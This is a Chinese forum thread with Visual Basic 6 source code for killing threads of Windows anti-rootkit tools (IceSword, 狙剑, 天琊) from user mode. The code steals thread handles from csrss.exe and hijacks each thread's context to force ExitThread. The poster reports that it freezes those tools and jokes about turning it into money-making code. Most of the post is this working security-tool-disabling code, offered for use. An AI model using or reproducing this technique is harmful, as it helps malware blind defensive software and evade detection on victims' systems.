[半原创]VB无驱杀冰刃、狙剑、天琊 - TaKillThread（2010-7-31更新）

HoviDelphic

TaOpenThread：参考了0x7E的思路和代码
TaTerminateThread：修改了Zzzians的代码
更新内容：在TaTerminateThread中把待结束线程的寄存器值全部清零。

fMain.frm：

1. 
   
2. Option Explicit
   
3. Private Sub cmdKillThread_Click()
   
4.     TaKillThread CLng(Text1.Text)
   
5. End Sub
   
6. Private Sub Form_Load()
   
7.     RtlAdjustPrivilege 20, 1, 0, 0
   
8. End Sub
   

复制代码

mGetHandle.bas：

1. 
   
2. Option Explicit
   
3. Private Declare Function ZwDuplicateObject Lib "NTDLL.DLL" (ByVal hps As Long, ByVal hs As Long, ByVal ho As Long, ByRef hr As Long, Optional ByVal ac As Long = 2035711, Optional ByVal ha As Long = 0, Optional ByVal op As Long = 4) As Long
   
4. Private Declare Function ZwOpenProcess Lib "NTDLL.DLL" (H As Long, ByVal a As Long, b As Any, c As Any) As Long
   
5. Private Declare Function ZwQuerySystemInformation Lib "NTDLL.DLL" (ByVal t As Long, p As Any, ByVal n As Long, r As Long) As Long
   
6. Private Declare Function ZwOpenProcessToken Lib "ntdll" (ByVal H As Long, ByVal a As Long, H As Long) As Long
   
7. Private Declare Function MovMem Lib "NTDLL.DLL" Alias "RtlMoveMemory" (ByVal pD As Long, ByVal ps As Long, Optional ByVal nL As Long = 4) As Long
   
8. Private Declare Function ZwClose Lib "NTDLL.DLL" (ByVal H As Long) As Long
   
9. Private Declare Function CsrGetProcessId Lib "NTDLL.DLL" () As Long
   
10. Private Declare Function ZwQueryInformationThread Lib "NTDLL.DLL" (ByVal hThread As Long, ByVal ThreadInformationClass As Long, ByVal ThreadInformation As Long, ByVal ThreadInformationLength As Long, ReturnLength As Long) As Long
    
11. Private Declare Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwThreadId As Long) As Long
    
12. Private Type CLIENT_ID
    
13.     UniqueProcess As Long
    
14.     UniqueThread  As Long
    
15. End Type
    
16. Private Type THREAD_BASIC_INFORMATION
    
17.     ExitStatus      As Long
    
18.     TebBaseAddress  As Long
    
19.     ClientId        As CLIENT_ID
    
20.     AffinityMask    As Long
    
21.     Priority        As Long
    
22.     BasePriority    As Long
    
23. End Type
    
24. Private Type SYSTEM_HANDLE_TABLE_ENTRY_INFO
    
25.     UniqueProcessId As Integer
    
26.     CreatorBackTraceIndex As Integer
    
27.     ObjectTypeIndex As Byte
    
28.     HandleAttributes As Byte
    
29.     HandleValue As Integer
    
30.     pObject As Long
    
31.     GrantedAccess As Long
    
32. End Type
    
33. Private Type OBJECT_ATTRIBUTES
    
34.     Length As Long
    
35.     RootDirectory As Long
    
36.     ObjectName As Long
    
37.     Attributes As Long
    
38.     SecurityDescriptor As Long
    
39.     SecurityQualityOfService As Long
    
40. End Type
    
41. Private Function OpenPs(ByVal pid As Long, Optional acs As Long = &H40)
    
42.     Dim b As OBJECT_ATTRIBUTES, c As CLIENT_ID, H As Long, st As Long
    
43.     c.UniqueProcess = pid
    
44.     st = ZwOpenProcess(H, acs, b, c)
    
45.     If st = 0 Then OpenPs = H
    
46. End Function
    
47. Private Function hToTid(ByVal H As Long) As Long
    
48.     Dim tbi As THREAD_BASIC_INFORMATION
    
49.     Dim st As Long
    
50.     st = ZwQueryInformationThread(H, 0&, VarPtr(tbi), 28, ByVal 0&)
    
51.     If st = 0 Then hToTid = tbi.ClientId.UniqueThread
    
52. End Function
    
53. Public Function DuplicateThreadHandle(ByVal tid As Long, ByVal OTT As Long) As Long
    
54.     Dim st() As SYSTEM_HANDLE_TABLE_ENTRY_INFO, buf() As Long, Csr As Long, hCsr As Long
    
55.     Dim cnt As Long, i As Long, rtn As Long, Sx As Long
    
56.     ReDim buf(4) As Long
    
57.     Sx = ZwQuerySystemInformation(16, buf(0), 20, 0)
    
58.     cnt = buf(0) * 4
    
59.     ReDim buf(cnt) As Long
    
60.     Sx = ZwQuerySystemInformation(16, buf(0), cnt * 4 + 4, 0)
    
61.     ReDim st(buf(0) - 1) As SYSTEM_HANDLE_TABLE_ENTRY_INFO
    
62.     MovMem VarPtr(st(0)), VarPtr(buf(1)), cnt
    
63.     Erase buf
    
64.     Csr = CsrGetProcessId()
    
65.     hCsr = OpenPs(Csr)
    
66.     If hCsr = 0 Then Exit Function
    
67.     For i = 0 To cnt / 4 - 1
    
68.         With st(i)
    
69.             If .ObjectTypeIndex = OTT And .UniqueProcessId = Csr Then
    
70.                 Sx = ZwDuplicateObject(hCsr, .HandleValue, -1, rtn, 2032639)
    
71.                 If hToTid(rtn) = tid Then
    
72.                     DuplicateThreadHandle = rtn
    
73.                     Exit For
    
74.                 Else
    
75.                     ZwClose rtn
    
76.                 End If
    
77.             End If
    
78.         End With
    
79.     Next i
    
80.     ZwClose hCsr
    
81. End Function
    
82. Public Function TaOpenThread(ByVal dwThreadId As Long) As Long
    
83.     Dim hOut As Long
    
84.     hOut = OpenThread(2032639, 0, dwThreadId)
    
85.     If hOut = 0 Then
    
86.         hOut = DuplicateThreadHandle(dwThreadId, 6) '2k/xp/2k3
    
87.     End If
    
88.     If hOut = 0 Then
    
89.         hOut = DuplicateThreadHandle(dwThreadId, 7) 'vista/08/7
    
90.     End If
    
91.     TaOpenThread = hOut
    
92. End Function
    

复制代码

mTerminate.bas：

1. 
   
2. Option Explicit
   
3. Public Declare Function RtlAdjustPrivilege Lib "ntdll" _
   
4.                                 (ByVal Privilege As Long, ByVal Newvalue As Long, ByVal NewThread As Long, Oldvalue As Long) As Long
   
5. Public Declare Function NtSuspendThread _
   
6.                Lib "NTDLL.DLL" (ByVal ThreadHandle As Long, _
   
7.                                 ByRef PreviousSuspendCount As Long) As Long
   
8. Public Declare Function NtResumeThread _
   
9.                Lib "NTDLL.DLL" (ByVal ThreadHandle As Long, _
   
10.                                 ByRef SuspendCount As Long) As Long
    
11. Public Declare Function NtSetContextThread _
    
12.                Lib "NTDLL.DLL" (ByVal ThreadHandle As Long, _
    
13.                                 ByRef ThreadContext As CONTEXT) As Long
    
14. Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
    
15. Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
    
16. Public Declare Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwThreadId As Long) As Long
    
17. Private Declare Function PostThreadMessage Lib "user32.dll" Alias "PostThreadMessageA" (ByVal idThread As Long, ByVal msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    
18. Public Type FLOATING_SAVE_AREA
    
19.      ControlWord As Long
    
20.      StatusWord As Long
    
21.      TagWord As Long
    
22.      ErrorOffset As Long
    
23.      ErrorSelector As Long
    
24.      DataOffset As Long
    
25.      DataSelector As Long
    
26.      RegisterArea(1 To &H50) As Byte
    
27.      Cr0NpxState As Long
    
28. End Type
    
29. Public Type CONTEXT
    
30.      ContextFlags As Long
    
31.      Dr0 As Long
    
32.      Dr1 As Long
    
33.      Dr2 As Long
    
34.      Dr3 As Long
    
35.      Dr6 As Long
    
36.      Dr7 As Long
    
37.      FloatSave As FLOATING_SAVE_AREA
    
38.      SegGs As Long
    
39.      SegFs As Long
    
40.      SegEs As Long
    
41.      SegDs As Long
    
42.      Edi As Long
    
43.      Esi As Long
    
44.      Ebx As Long
    
45.      Edx As Long
    
46.      Ecx As Long
    
47.      Eax As Long
    
48.      Ebp As Long
    
49.      Eip As Long '这个邪恶
    
50.      SegCs As Long
    
51.      EFlags As Long
    
52.      Esp As Long
    
53.      SegSs As Long
    
54.      ExtendedRegisters(1 To &H200) As Byte
    
55. End Type
    
56. Public Const CONTEXT_i386 As Long = &H10000
    
57. Public Const CONTEXT_i486 As Long = &H10000
    
58. Public Const CONTEXT_CONTROL As Long = (CONTEXT_i386 Or &H1)
    
59. Public Const CONTEXT_INTEGER As Long = (CONTEXT_i386 Or &H2)
    
60. Public Const CONTEXT_SEGMENTS As Long = (CONTEXT_i386 Or &H4)
    
61. Public Const CONTEXT_FLOATING_POINT As Long = (CONTEXT_i386 Or &H8)
    
62. Public Const CONTEXT_DEBUG_REGISTERS As Long = (CONTEXT_i386 Or &H10)
    
63. Public Const CONTEXT_EXTENDED_REGISTERS As Long = (CONTEXT_i386 Or &H20)
    
64. Public Const CONTEXT_FULL As Long = (CONTEXT_CONTROL Or CONTEXT_INTEGER Or CONTEXT_SEGMENTS)
    
65. Public Const CONTEXT_ALL As Long = (CONTEXT_CONTROL Or CONTEXT_INTEGER Or CONTEXT_SEGMENTS Or CONTEXT_FLOATING_POINT Or CONTEXT_DEBUG_REGISTERS Or CONTEXT_EXTENDED_REGISTERS)
    
66. Public Function TaTerminateThread(ByVal hThread As Long) As Long
    
67.     Dim ctx As CONTEXT
    
68.     Dim Ret As Long, hApiAddr As Long, hModule As Long
    
69.     ctx.ContextFlags = CONTEXT_ALL
    
70.     hModule = GetModuleHandle("kernel32.dll")
    
71.     hApiAddr = GetProcAddress(hModule, "ExitThread")
    
72.     ctx.Eip = hApiAddr
    
73.     ctx.Eax = 0
    
74.     ctx.Ebp = 0
    
75.     ctx.Ebx = 0
    
76.     ctx.Ecx = 0
    
77.     ctx.Edi = 0
    
78.     ctx.Edx = 0
    
79.     ctx.Esi = 0
    
80.     Call NtSuspendThread(hThread, Ret)
    
81.     TaTerminateThread = IIf(NtSetContextThread(hThread, ctx), 0, 1)
    
82.     Call NtResumeThread(hThread, Ret)
    
83. End Function
    
84. Public Sub TaKillThread(ByVal dwThreadId As Long)
    
85.     Dim hThread As Long
    
86.     hThread = TaOpenThread(dwThreadId)
    
87.     If hThread <> 0 Then
    
88.         TaTerminateThread (hThread)
    
89.     End If
    
90. End Sub
    

复制代码

HoviDelphic

沙发不留。
经测试，能让冰刃、狙剑、天琊假死。
当然，用来杀线程是很无聊的，改成“能创造GDP的代码”才有意义。

HoviDelphic

回复 4# 本网站最菜的人


    TaOpenFile根本不存在，忽悠你的，嘿嘿，别生气……
    SetHandleInformation不稳定，我再改改，原理见这里：http://bbs.kanxue.com/printthread.php?t=91447

cycz222

好深奥啊，不懂

Tesla.Angela

不认识SYF，膜拜 + 学习TAOPENTHREAD
PS：继续期待SetHandleInformation（貌似有个句柄继承相关的API叫Set ...
本网站最菜的人 发表于 2010-5-29 22:28

　　不好意思，用户态的MySetHandleInformation失败了，看来某些东西我理解错了。
　　内核态的别人已经干成功了，也就没什么好写的了。

Tesla.Angela

把context结构中寄存器的值全部改成0，效果更爽。

TengAttack

汗，看到Ta开头，我还以为指我那……

Tesla.Angela

回复 12# naylon


就是不可能在Ring3实现。。。

fengerpro

好深奥啊，不懂

夜太美

看起来不是那么简单额。。。